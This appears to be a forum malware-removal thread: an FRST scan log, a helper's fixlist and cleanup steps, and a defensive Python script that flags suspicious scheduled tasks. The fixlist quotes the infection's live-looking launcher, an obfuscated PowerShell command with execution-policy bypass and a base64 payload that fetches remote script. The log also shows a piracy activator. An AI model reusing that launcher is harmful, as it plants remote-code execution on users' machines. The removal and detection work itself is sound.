ContextMenuHandlers1: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Alfredo y Diego\AppData\Local\MEGAsync\ShellExtX32.dll [2017-10-18] () [File not signed]
ContextMenuHandlers1: [WinRAR] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2017-08-11] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers2: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Alfredo y Diego\AppData\Local\MEGAsync\ShellExtX32.dll [2017-10-18] () [File not signed]
ContextMenuHandlers3: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Alfredo y Diego\AppData\Local\MEGAsync\ShellExtX32.dll [2017-10-18] () [File not signed]
ContextMenuHandlers4: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Alfredo y Diego\AppData\Local\MEGAsync\ShellExtX32.dll [2017-10-18] () [File not signed]
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\Windows\system32\igfxpph.dll [2009-09-23] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
ContextMenuHandlers6: [StartMenuExt] -> {E595F05F-903F-4318-8B0A-7F633B520D2B} => C:\Windows\system32\StartMenuHelper32.dll [2017-08-13] (Ivaylo Beltchev -> IvoSoft) [File not signed]
ContextMenuHandlers6: [WinRAR] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2017-08-11] (win.rar GmbH -> Alexander Roshal)

==================== Codecs (Whitelisted) ====================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Drivers32: [msacm.vorbis] => C:\Windows\system32\vorbis.acm [1456448 2016-11-02] (Image Line -> HMS hxxp://hp.vector.co.jp/authors/VA012897/) [File not signed]

==================== Shortcuts & WMI ========================

==================== Loaded Modules (Whitelisted) =============

2017-10-18 17:58 - 2017-10-18 17:58 - 000570368 _____ () [File not signed] C:\Users\Alfredo y Diego\AppData\Local\MEGAsync\ShellExtX32.dll
2017-08-13 08:49 - 2017-08-13 08:49 - 003239736 _____ (Ivaylo Beltchev -> IvoSoft) [File not signed] C:\Program Files\Classic Shell\ClassicStartMenuDLL.dll
2016-07-16 04:25 - 2016-07-16 04:25 - 000226304 _____ (Microsoft Corporation) [File not signed] C:\Windows\System32\container.dll
2016-07-16 04:25 - 2017-11-28 18:19 - 000067584 _____ (Microsoft Corporation) [File not signed] C:\Windows\system32\UXINIT.dll
2016-07-16 04:25 - 2017-11-28 18:19 - 000479232 _____ (Microsoft Corporation) [File not signed] C:\Windows\system32\UxTheme.dll

==================== Alternate Data Streams (Whitelisted) ========

==================== Safe Mode (Whitelisted) ==================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" value will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\77576241.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\77576241.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WRkrn => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WRSVC => ""="Service"

==================== Association (Whitelisted) =================

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)

HKU\S-1-5-21-1270689601-2402022770-626450427-1001\Software\Classes\regfile: regedit.exe "%1" <==== ATTENTION

==================== Internet Explorer trusted/restricted ==========

==================== Hosts content: =========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2016-07-16 04:30 - 2019-11-23 14:18 - 000001012 _____ C:\Windows\system32\drivers\etc\hosts
127.0.0.1                   license.avira.com
127.0.0.1                   62.146.210.6
127.0.0.1                   62.146.210.10
0.0.0.0                   telemetry.malwarebytes.com

==================== Other Areas ===========================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-19-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-11242019072623682\Control Panel\Desktop\\Wallpaper -> C:\Windows\Web\Wallpaper\Windows\img0.jpg
HKU\S-1-5-20-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-11242019072624070\Control Panel\Desktop\\Wallpaper -> C:\Windows\Web\Wallpaper\Windows\img0.jpg
HKU\S-1-5-21-1270689601-2402022770-626450427-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-11242019072625010\Control Panel\Desktop\\Wallpaper -> C:\Windows\Web\Wallpaper\Windows\img0.jpg
HKU\S-1-5-21-1270689601-2402022770-626450427-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Alfredo y Diego\Pictures\japan.jpg
DNS Servers: 1.1.1.1 - 1.0.0.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: Off)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(If an entry is included in the fixlist, it will be removed.)

HKLM\...\StartupApproved\StartupFolder: => "Welcome.lnk"
HKLM\...\StartupApproved\Run: => "HotKeysCmds"
HKLM\...\StartupApproved\Run: => "IgfxTray"
HKU\S-1-5-21-1270689601-2402022770-626450427-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-11242019072625010\...\StartupApproved\StartupFolder: => "MEGAsync.lnk"
HKU\S-1-5-21-1270689601-2402022770-626450427-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-11242019072625010\...\StartupApproved\Run: => "BitTorrent"
HKU\S-1-5-21-1270689601-2402022770-626450427-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-11242019072625010\...\StartupApproved\Run: => "NetBalancer"
HKU\S-1-5-21-1270689601-2402022770-626450427-1001\...\StartupApproved\StartupFolder: => "MEGAsync.lnk"
HKU\S-1-5-21-1270689601-2402022770-626450427-1001\...\StartupApproved\Run: => "BitTorrent"
HKU\S-1-5-21-1270689601-2402022770-626450427-1001\...\StartupApproved\Run: => "NetBalancer"

==================== FirewallRules (Whitelisted) ================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [{C10AE170-F82A-4B4E-9A1B-0FD58F380673}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{2BF8D208-B1A9-49CA-94B8-C76C91D6DC27}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{409C381F-6252-4189-A0D6-1D853AECA432}] => (Allow) C:\Users\Alfredo y Diego\AppData\Roaming\BitTorrent\BitTorrent.exe (BitTorrent Inc -> BitTorrent Inc.)
FirewallRules: [{44FF4D34-B7E4-4374-8312-8F6034AE79FF}] => (Allow) C:\Users\Alfredo y Diego\AppData\Roaming\BitTorrent\BitTorrent.exe (BitTorrent Inc -> BitTorrent Inc.)
FirewallRules: [{7E9FD9B8-6893-45D6-85A7-823768AB61B2}] => (Allow) C:\Users\Alfredo y Diego\AppData\Roaming\BitTorrent\BitTorrent.exe (BitTorrent Inc -> BitTorrent Inc.)
FirewallRules: [{F47A6534-32F0-4809-81EB-11D1999B0341}] => (Allow) C:\Users\Alfredo y Diego\AppData\Roaming\BitTorrent\BitTorrent.exe (BitTorrent Inc -> BitTorrent Inc.)
FirewallRules: [{BA6A314B-F612-4F67-B4FA-82AC37CDB225}] => (Allow) C:\Users\Alfredo y Diego\AppData\Roaming\BitTorrent\BitTorrent.exe (BitTorrent Inc -> BitTorrent Inc.)
FirewallRules: [{0F27CFC4-5D88-4FBE-B29C-3E7E04787082}] => (Allow) C:\Users\Alfredo y Diego\AppData\Roaming\BitTorrent\BitTorrent.exe (BitTorrent Inc -> BitTorrent Inc.)
FirewallRules: [{034EBB93-05BC-4DCA-B601-532892C005E7}] => (Allow) C:\Program Files\WOMic\womicclient.exe () [File not signed]
FirewallRules: [TCP Query User{2D7A0D93-490E-4783-BA7A-7BCE836A271F}C:\program files\soulseekqt\soulseekqt.exe] => (Allow) C:\program files\soulseekqt\soulseekqt.exe () [File not signed]
FirewallRules: [UDP Query User{83C0F883-FF24-42B7-BCBE-AD199A908B7F}C:\program files\soulseekqt\soulseekqt.exe] => (Allow) C:\program files\soulseekqt\soulseekqt.exe () [File not signed]
FirewallRules: [{516EB9A4-E9E7-4111-AE83-004A90AC041A}] => (Allow) C:\Program Files\CCleaner\CCUpdate.exe (Piriform Software Ltd -> Piriform Software Ltd)
FirewallRules: [{7EE08CA1-6420-4E11-BFD5-D08A9A6F1C6D}] => (Allow) C:\Program Files\CCleaner\CCUpdate.exe (Piriform Software Ltd -> Piriform Software Ltd)
FirewallRules: [TCP Query User{83827D30-5867-4418-9BC0-7EC57F94959F}C:\users\alfredo y diego\appdata\roaming\telegram desktop\telegram.exe] => (Allow) C:\users\alfredo y diego\appdata\roaming\telegram desktop\telegram.exe (Telegram FZ-LLC -> Telegram FZ-LLC)
FirewallRules: [UDP Query User{9829ACBF-2A09-467D-B4F5-C796784D0A6E}C:\users\alfredo y diego\appdata\roaming\telegram desktop\telegram.exe] => (Allow) C:\users\alfredo y diego\appdata\roaming\telegram desktop\telegram.exe (Telegram FZ-LLC -> Telegram FZ-LLC)
FirewallRules: [{BF42FCFB-2966-43C0-B98D-9CDE94AB2D27}] => (Allow) C:\Program Files\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)
FirewallRules: [{DB2F6D70-FE0F-451E-99D6-2AB8DF99C811}] => (Block) LPort=445
FirewallRules: [{22929FC6-337C-4B8A-B235-5524BCADB8CD}] => (Allow) LPort=65532
FirewallRules: [{AEF94FB4-418F-4A60-AF02-64984FFCF2E2}] => (Block) LPort=445
FirewallRules: [{A0A1E9C9-5C9A-471C-9F6C-4B1C23976173}] => (Allow) LPort=65531
FirewallRules: [{07973D50-A474-4621-898F-4C73EC0DB89E}] => (Allow) LPort=65533
FirewallRules: [{AB9130B0-864B-49D2-9558-C21383817A64}] => (Block) LPort=445
FirewallRules: [{923EC434-EB71-46C6-914A-884E48B36D7F}] => (Block) LPort=445
FirewallRules: [{30B998DC-75D6-4156-95EB-265FD24D628D}] => (Block) LPort=445
FirewallRules: [{B1391700-10E2-43FC-A5EF-1EFB3D3B9A13}] => (Block) LPort=445
FirewallRules: [{2079D785-460B-4A5A-9CC3-71DCE55D19F8}] => (Allow) LPort=65529
FirewallRules: [{13E5D93B-5566-4BFF-9E69-881E58CA43B0}] => (Block) LPort=445
FirewallRules: [{076D4D22-0F61-402C-A92D-01DE3C0A37F1}] => (Block) LPort=445
FirewallRules: [{84770D54-494B-4AC4-828B-424081CEB1C9}] => (Block) LPort=445
FirewallRules: [{14131298-A239-4D8E-9944-3D77581E67E1}] => (Block) LPort=445

==================== Restore Points =========================

16-11-2019 01:48:32 Instalado Realtek High Definition Audio Driver

==================== Faulty Device Manager Devices ============

Name: Dispositivo USB desconocido (Error de solicitud de descriptor de dispositivo)
Description: Dispositivo USB desconocido (Error de solicitud de descriptor de dispositivo)
Class Guid: {36fc9e60-c465-11cf-8056-444553540000}
Manufacturer: (Controladora de host USB estándar)
Service: 
Problem: : Windows has stopped this device because it has reported problems. (Code 43)
Resolution: One of the drivers controlling the device notified the operating system that the device failed in some manner. For more information about how to diagnose the problem, see the hardware documentation. 


==================== Event log errors: ========================

Application errors:
==================
Error: (11/23/2019 10:07:51 AM) (Source: Perflib) (EventID: 1008) (User: )
Description: Error del procedimiento de apertura para el servicio "BITS" en el archivo DLL "C:\Windows\System32\bitsperf.dll". Los datos de rendimiento para este servicio no estarán disponibles. Los primeros cuatro bytes (DWORD) de la sección de datos contienen el código de error.

Error: (11/23/2019 09:50:53 AM) (Source: MBAMIService) (EventID: 0) (User: )
Description: Event-ID 0

Error: (11/22/2019 10:24:16 PM) (Source: VSS) (EventID: 8193) (User: )
Description: Error del Servicio de instantáneas de volumen: error inesperado al llamar a la rutina QueryFullProcessImageNameW. HR = 0x80070006, Controlador no válido.
.


Operación:
   Ejecutando operación asincrónica

Contexto:
   Estado actual: DoSnapshotSet

Error: (11/22/2019 10:21:58 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Error en Servicios de cifrado mientras se procesaba el objeto "System Writer" de la llamada OnIdentity().

Details:
AddLegacyDriverFiles: Unable to back up image of binary Protocolo de detección de nivel de vínculo de Microsoft.

System Error:
Acceso denegado.
.

Error: (11/22/2019 10:21:39 PM) (Source: VSS) (EventID: 8194) (User: )
Description: Error del Servicio de instantáneas de volumen: error inesperado al consultar la interfaz IVssWriterCallback. HR = 0x80070005, Acceso denegado.
.
A menudo ocurre por una configuración de seguridad incorrecta en el proceso de escritura o de solicitud.


Operación:
   Recopilando datos del escritor

Contexto:
   Id. de clase del escritor: {e8132975-6f93-4464-a53e-1050253ae220}
   Nombre del escritor: System Writer
   Id. de instancia del escritor: {a9bf6df7-ee3e-4c3c-bddc-813803a0f303}

Error: (11/22/2019 07:34:39 PM) (Source: COM) (EventID: 18221) (User: NT AUTHORITY)
Description: Se denegó el acceso al intento de conexión con el servicio RPCSS para la aplicación de servidor COM C:\Windows\System32\Wbem\WMIC.exe al usuario No disponible\No disponible con SID (S-1-5-18) que se ejecuta en el contenedor de aplicaciones con SID No disponible (No disponible). La causa más probable es que los límites de acceso a nivel de equipo no conceden permisos de acceso local al usuario o a la aplicación. Los límites de acceso se pueden modificar con la herramienta administrativa Servicios de componentes.

Error: (11/22/2019 04:21:13 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Error al generar el contexto de activación para "C:\Users\Alfredo y Diego\Downloads\KMSAuto Lite\KMSAuto Lite 1.4.5 b1 Multilingual by Ratiborus\KMSAuto x64.exe".
No se encontró el ensamblado dependiente Microsoft.Windows.Common-Controls,language="&#x2a;",processorArchitecture="amd64",publicKeyToken="6595b64144ccf1df",type="win32",version="6.0.0.0".
Use sxstrace.exe para obtener un diagnóstico detallado.

Error: (11/22/2019 06:48:28 AM) (Source: Perflib) (EventID: 1008) (User: )
Description: Error del procedimiento de apertura para el servicio "BITS" en el archivo DLL "C:\Windows\System32\bitsperf.dll". Los datos de rendimiento para este servicio no estarán disponibles. Los primeros cuatro bytes (DWORD) de la sección de datos contienen el código de error.


System errors:
=============
Error: (11/24/2019 07:23:56 AM) (Source: Microsoft-Windows-Kernel-Processor-Power) (EventID: 6) (User: NT AUTHORITY)
Description: Se deshabilitaron algunas características de administración de energía en estado de rendimiento del procesador debido a un problema conocido de firmware. Consulte al fabricante del equipo si hay firmware actualizado.

Error: (11/23/2019 10:37:15 PM) (Source: Microsoft-Windows-Kernel-Processor-Power) (EventID: 6) (User: NT AUTHORITY)
Description: Se deshabilitaron algunas características de administración de energía en estado de rendimiento del procesador debido a un problema conocido de firmware. Consulte al fabricante del equipo si hay firmware actualizado.

Error: (11/23/2019 10:35:16 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: El servicio Adaptador de rendimiento de WMI terminó inesperadamente. Esto se ha repetido 1 veces. Se realizará la siguiente acción correctora en 120000 milisegundos: Reiniciar el servicio.

Error: (11/23/2019 08:26:59 PM) (Source: Microsoft-Windows-Kernel-Processor-Power) (EventID: 6) (User: NT AUTHORITY)
Description: Se deshabilitaron algunas características de administración de energía en estado de rendimiento del procesador debido a un problema conocido de firmware. Consulte al fabricante del equipo si hay firmware actualizado.

Error: (11/23/2019 12:21:36 PM) (Source: Microsoft-Windows-Kernel-Processor-Power) (EventID: 6) (User: NT AUTHORITY)
Description: Se deshabilitaron algunas características de administración de energía en estado de rendimiento del procesador debido a un problema conocido de firmware. Consulte al fabricante del equipo si hay firmware actualizado.

Error: (11/23/2019 12:21:45 PM) (Source: EventLog) (EventID: 6008) (User: )
Description: El cierre anterior del sistema a las 10:30:42 a.m. del ‎23/‎11/‎2019 resultó inesperado.

Error: (11/23/2019 09:50:34 AM) (Source: Microsoft-Windows-Kernel-Processor-Power) (EventID: 6) (User: NT AUTHORITY)
Description: Se deshabilitaron algunas características de administración de energía en estado de rendimiento del procesador debido a un problema conocido de firmware. Consulte al fabricante del equipo si hay firmware actualizado.

Error: (11/23/2019 09:33:57 AM) (Source: Microsoft-Windows-Kernel-Processor-Power) (EventID: 6) (User: NT AUTHORITY)
Description: Se deshabilitaron algunas características de administración de energía en estado de rendimiento del procesador debido a un problema conocido de firmware. Consulte al fabricante del equipo si hay firmware actualizado.


CodeIntegrity:
===================================

Date: 2019-11-23 21:52:02.107
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Google\Chrome\Application\chrome.exe) attempted to load \Device\HarddiskVolume2\Program Files\Malwarebytes\Anti-Malware\mbae.dll that did not meet the Microsoft signing level requirements.

Date: 2019-11-23 12:29:46.793
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Google\Chrome\Application\chrome.exe) attempted to load \Device\HarddiskVolume2\Program Files\Malwarebytes\Anti-Malware\mbae.dll that did not meet the Microsoft signing level requirements.

==================== Memory info =========================== 

BIOS: American Megatrends Inc. P1.30 02/27/2008
Motherboard:                        Wolfdale1333-D667  
Processor: Intel(R) Pentium(R) Dual CPU E2180 @ 2.00GHz
Percentage of memory in use: 85%
Total physical RAM: 1015.3 MB
Available physical RAM: 149.15 MB
Total Virtual: 2743.3 MB
Available Virtual: 1352.92 MB

==================== Drives ================================

Drive c: (SYSTEM) (Fixed) (Total:148.71 GB) (Free:25.92 GB) NTFS

\\?\Volume{40834082-0000-0000-0000-100000000000}\ (Reservado para el sistema) (Fixed) (Total:0.34 GB) (Free:0.08 GB) NTFS

==================== MBR & Partition Table ====================

==========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 149.1 GB) (Disk ID: 40834082)
Partition 1: (Active) - (Size=350 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=148.7 GB) - (Type=07 NTFS)

==================== End of Addition.txt =======================

Hello

You have not downloaded and run FRST from the desktop; move it there, otherwise the Fixlist step will fail.

:arrow_forward: VERY Important :arrow_backward: Make a backup of the registry:

  • To do so, download :arrow_forward: DelFix.exe (to your desktop).

  • Double-click to run it. (If you use Windows Vista/7/8 or 10, right-click and select -Run as Administrator-).

  • Attention: now check/select only the "Create registry backup" box, NOT the others.

  • Click Run.

The report (DelFix.txt) will open; save it in case it is needed and close the tool.

Next, :warning: with all other programs closed, go to :arrow_forward: Start :arrow_forward: Run :arrow_forward: and type Notepad.exe.

  • Now copy and paste the codes/lines inside the box below into Notepad.
START
CREATERESTOREPOINT:
CLOSEPROCESSES:
HKLM\...\Run: [] => [X]
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-1270689601-2402022770-626450427-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-11242019072625010\...\Run: [NetLimiter] => "C:\Program Files\Locktime Software\NetLimiter 4\nlclientapp.exe" /minimized
HKU\S-1-5-21-1270689601-2402022770-626450427-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-11242019072625010\...\Run: [BitTorrent] => C:\Users\Alfredo y Diego\AppData\Roaming\BitTorrent\BitTorrent.exe [2066160 2019-11-16] (BitTorrent Inc -> BitTorrent Inc.)
HKU\S-1-5-21-1270689601-2402022770-626450427-1001\...\Run: [BitTorrent] => C:\Users\Alfredo y Diego\AppData\Roaming\BitTorrent\BitTorrent.exe [2066160 2019-11-16] (BitTorrent Inc -> BitTorrent Inc.)
HKU\S-1-5-21-1270689601-2402022770-626450427-1001\...\Run: [] => [X]
HKU\S-1-5-21-1270689601-2402022770-626450427-1001\...\Winlogon: [Shell] C:\Windows\explorer.exe [4312248 2016-07-16] (Microsoft Windows -> Microsoft Corporation) <==== ATTENTION
Task => {35EF4182-F900-4632-B072-8639E4478A61}
Task: {87402BF2-539F-45AA-B6A8-686921A45CD0} - System32\Tasks\Avast Software\Overseer => C:\Program Files\Common Files\AVAST Software\Overseer\overseer.exe [1542536 2019-11-05] (AVAST Software s.r.o. -> AVAST Software)
Task: {D637D5F4-3706-45D2-9DED-A40EB449CDE9} - System32\Tasks\MicroSoft\Windows\owBmpfYO\JpNYrnb => cmd /c "set A=power& call %A%shell -ep bypass -e JABMAGUAbQBvAG4AXwBEAHUAYwBrAD0AJwBNAGkAYwByAG8AUwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABvAHcAQgBtAHAAZgBZAE8AXABKAHAATgBZAHIAbgBiACcAOwAkAHkAPQAnAGgAdAB0AHAAOgAvAC8AdAAuAGEAbQB4AG4AeQAuAGMAbwBtAC8AdgAuAGoAcwAnADsAJAB6AD0AJAB5ACsAJwBwACcAKwAnAD8AbQBpAGcAXwAyADA (the data entry has 586 more characters).
Task: {FEE784E9-0FE0-4E99-9F72-131A85CDE224} - \VQMUsn\GXQxU -> No File <==== ATTENTION
CHR Extension: (Asora) - C:\Users\Alfredo y Diego\AppData\Local\Google\Chrome\User Data\Default\Extensions\jfomjghdcjmkkmjpmdiimfllafbmpack [2018-08-12]
CHR Extension: (Chrome Media Router) - C:\Users\Alfredo y Diego\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-11-06]
CHR HKU\S-1-5-21-1270689601-2402022770-626450427-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [ijahobfejgeblmkpcmgpelfibgnnjpil]
CHR HKU\S-1-5-21-1270689601-2402022770-626450427-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [pilplloabdedfmialnfchjomjmpjcoej]
U4 dcpsvc; no ImagePath
U4 DiagTrack; no ImagePath
2019-11-16 01:54 - 2019-11-23 14:52 - 000002472 _____ C:\Windows\system32\Tasks\{2A3E5AA4-AD05-45CD-A693-C23160DA1F7B}
2019-11-06 06:04 - 2019-11-23 20:27 - 000000428 _____ C:\Windows\Tasks\update-sys.job
2019-11-06 06:04 - 2019-11-23 20:27 - 000000428 _____ C:\Windows\Tasks\update-S-1-5-21-1270689601-2402022770-626450427-1001.job
2019-11-23 22:35 - 2018-07-19 02:02 - 000000000 ____D C:\Users\Alfredo y Diego\AppData\Roaming\IObit
2019-11-23 22:35 - 2018-07-19 02:02 - 000000000 ____D C:\ProgramData\IObit
2019-11-23 02:50 - 2018-11-10 22:07 - 000000000 ____D C:\ProgramData\{2F4FEA2C-A50D-60EA-23CB-FEA8B9897566}
ShellServiceObjects: No Name -> {872f8dc8-dde4-43bd-ac7a-e3d9fe86ceac} => 
ShellServiceObjects: No Name -> {900c0763-5cad-4a34-bc1f-40cd513679d5} => 
HKU\S-1-5-21-1270689601-2402022770-626450427-1001\Software\Classes\regfile: regedit.exe "%1" <==== ATTENTION

HOSTS:
REMOVEPROXY:
EMPTYTEMP:
CMD: netsh winsock reset
CMD: ipconfig /renew
CMD: ipconfig /flushdns
CMD: bitsadmin /reset /allusers
CMD: netsh advfirewall reset
CMD: netsh advfirewall set allprofiles state ON
CMD: netsh int ipv4 reset
CMD: netsh int ipv6 reset
END

Save it under the name FIXLIST.TXT on the desktop :arrow_backward: This is very important.

:o: Note :o: It is important that the FRST.exe tool (Farbar Recovery Scanner Tool) and FIXLIST.TXT are in the same location (desktop); otherwise it will not work.


Now use the 2nd METHOD from this Windows 8 FAQ (applicable to Windows 10) :arrow_forward: How to start Windows 8/8.1 in Safe Mode?, to work from that Windows mode.

  • Run FRST.exe. (If you use Windows Vista/7/8 or 10, right-click and select -Run as Administrator-).
  • Click the FIX button and wait for it to finish.
  • The tool will save the repair report on the desktop (FIXLOG.TXT).

Paste the contents of this file in your next reply.

Restart the computer, check how it behaves with respect to the reported problem, and let me know.

Regards
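The fixlist above targets a scheduled task whose action hides "powershell" behind an environment variable (`set A=power& call %A%shell`), disables the execution policy (`-ep bypass`) and passes a base64 `-e` payload that FRST truncates, plus an orphaned task pointing to "No File". As an added example (not code from this thread, from FRST or from the Malwarebytes/FRST authors), the Python script below applies exactly those indicators to FRST-style `Task:` lines so an analyst can triage an Addition/FRST log offline. The sample lines, GUIDs, task names and the encoded payload are constructed for the example (the payload is a harmless `Write-Output`, not the one from the thread); the only assumption about FRST is the `Task: {GUID} - name => action` / `-> No File` line layout seen on this page.

```python
import base64
import re

# Constructed FRST-style "Task:" lines, not taken from the thread's log.
# The encoded payload is a harmless constructed command (base64 of UTF-16LE).
SAMPLE_ENCODED = base64.b64encode(
    "Write-Output 'constructed sample payload'".encode("utf-16le")
).decode("ascii")

SAMPLE_TASK_LINES = [
    "Task: {11111111-2222-3333-4444-555555555555} - System32\\Tasks\\Vendor\\Updater => "
    "C:\\Program Files\\Vendor\\updater.exe [123456 2019-11-05] (Vendor -> Vendor)",
    "Task: {66666666-7777-8888-9999-000000000000} - System32\\Tasks\\MicroSoft\\Windows\\xyz\\abc => "
    f'cmd /c "set A=power& call %A%shell -ep bypass -e {SAMPLE_ENCODED}"',
    "Task: {AAAAAAAA-BBBB-CCCC-DDDD-EEEEEEEEEEEE} - \\QQQ\\RRR -> No File <==== ATTENTION",
]

# FRST layout assumed from the page: "Task: {GUID} - <name> => <action>" or "-> No File".
TASK_RE = re.compile(r"^Task: \{([0-9A-Fa-f-]+)\} - (.+?) (?:=>|->) (.*)$")
# "set A=power& call %A%shell": the word "powershell" split across an env var.
SPLIT_PS_RE = re.compile(r"set\s+(\w+)=power\s*&\s*call\s+%\1%shell", re.I)
EP_BYPASS_RE = re.compile(r"-(?:ep|ex|exec|executionpolicy)\s+bypass", re.I)
ENC_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
CANONICAL_MS_PREFIX = "System32\\Tasks\\Microsoft\\"


def decode_encoded_command(b64: str) -> str:
    """Decode a PowerShell -EncodedCommand argument (base64 of UTF-16LE).

    FRST truncates long values ("the data entry has N more characters"),
    so the string may end mid-group and mid-character: drop a dangling
    base64 character, re-pad, and ignore a trailing odd byte.
    """
    b64 = b64.rstrip("=")
    if len(b64) % 4 == 1:          # a lone trailing char cannot form a byte
        b64 = b64[:-1]
    padded = b64 + "=" * (-len(b64) % 4)
    raw = base64.b64decode(padded, validate=False)
    return raw.decode("utf-16le", errors="ignore")


def analyze_task_line(line: str):
    """Return a dict describing the task and its indicators, or None if not a Task line."""
    m = TASK_RE.match(line)
    if not m:
        return None
    guid, name, action = m.groups()
    indicators = []
    decoded = None
    if "No File" in action:
        indicators.append("orphaned task (target binary missing)")
    # Folder spelled like Microsoft's but with different casing (e.g. "MicroSoft").
    if re.match(r"System32\\Tasks\\microsoft\\", name, re.I) and not name.startswith(CANONICAL_MS_PREFIX):
        indicators.append("non-canonical casing of Microsoft task folder")
    if SPLIT_PS_RE.search(action):
        indicators.append("powershell name split via environment variable")
    if EP_BYPASS_RE.search(action):
        indicators.append("execution policy bypass")
    enc = ENC_RE.search(action)
    if enc:
        indicators.append("encoded command")
        decoded = decode_encoded_command(enc.group(1))
    return {"guid": guid, "name": name, "action": action,
            "indicators": indicators, "decoded": decoded}


def scan_tasks(lines):
    """Return the analyses of all Task lines that carry at least one indicator."""
    results = []
    for line in lines:
        r = analyze_task_line(line)
        if r and r["indicators"]:
            results.append(r)
    return results


if __name__ == "__main__":
    for hit in scan_tasks(SAMPLE_TASK_LINES):
        print(hit["guid"], hit["name"])
        for ind in hit["indicators"]:
            print("   -", ind)
        if hit["decoded"]:
            print("   decoded:", hit["decoded"])
```

Feed it the `Task:` lines from a real FRST.txt and it prints only the entries worth a second look; the decoded text is shown for the analyst to read, never executed. The split-name and casing checks are the ones that a plain `powershell.exe` string match would miss.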